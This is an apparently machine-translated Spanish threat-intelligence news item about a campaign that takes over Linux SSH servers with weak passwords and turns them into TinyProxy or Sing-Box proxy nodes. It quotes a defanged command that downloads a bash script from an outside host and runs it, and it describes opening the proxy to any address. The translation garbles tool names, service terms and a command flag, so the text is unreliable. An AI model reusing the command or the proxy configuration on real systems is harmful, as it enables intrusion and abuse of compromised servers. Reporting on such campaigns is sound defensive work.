Los ciberdelincuentes han intensificado su asalto a los servidores SSH de Linux mal administrados, implementando herramientas proxy sofisticadas para establecer una infraestructura de red encubierta.
Estos ataques representan un cambio de la implementación tradicional de malware hacia la instalación estratégica de herramientas de red legítimas para fines maliciosos.
La campaña se dirige a los servidores de Linux con credenciales SSH débiles, explotando configuraciones de seguridad inadecuadas para obtener acceso no autorizado.
A diferencia de los ataques convencionales centrados en la minería de criptomonedas o las operaciones distribuidas de denegación de servicio, estas intrusiones apuntan específicamente a transformar los sistemas comprometidos en nodos proxy dentro de las redes criminales.
Investigadores de ASEC identificado Dos patrones de ataque primarios que involucran la instalación de herramientas proxy de tinyproxy y canto de canto.
Configuración y preservación de TinyProxy (fuente – ASEC)
Los ataques demuestran una precisión táctica, sin una implementación de malware extraña más allá de la infraestructura proxy central, lo que sugiere operaciones organizadas centradas en la construcción de redes proxy escalables.
La naturaleza sofisticada de estos ataques indica esfuerzos coordinados de los actores de amenaza que buscan monetizar la infraestructura comprometida a través de ofertas de poder como servicio o facilitar el anonimización para actividades criminales posteriores.
Mecanismo de infección y tácticas de implementación
La implementación de TinyProxy comienza con los atacantes que ejecutan un script de bash malicioso que contenga comentarios de lenguaje polaco, descargado a través del comando: (wget -o s.sh hxxps: // 0x0 (.) St/8vds.sh || curl -o s.sh hxxps: // 0x0 (.) St/8vds.sh) && chmod +x s.sh && sh s.sh.
El script detecta automáticamente el sistema operativo e instala a TinyProxy utilizando administradores de paquetes apropiados, incluidos APT, YUM o DNF.
Crítico para el éxito del ataque es la manipulación de configuración de los controles de acceso de TinyProxy.
El malware elimina las reglas de permitir y negar existentes de /etc/tinyproxy/tinyproxy.conf, reemplazándolas con Permitir 0.0.0.0/0, permitiendo efectivamente el acceso externo sin restricciones a través del puerto 8888.
La variante Sing-Box utiliza scripts de instalación alojados en GitHub, implementando un proxy multipropósito que admite el arto VMess-Arte, Vless-Reality, Hysteria2 y los protocolos TUICV5, diseñados originalmente para evitar restricciones de contenido geográfico, pero reutilizados para las redes proxy criminales.
Investigue el comportamiento de malware en vivo, rastree cada paso de un ataque y tome decisiones de seguridad más rápidas y inteligentes -> Prueba cualquiera.
